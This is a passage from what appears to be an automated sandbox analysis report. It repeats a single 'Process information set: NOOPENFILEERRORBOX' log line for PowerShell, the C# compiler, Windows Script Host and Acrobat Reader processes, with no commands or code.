                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
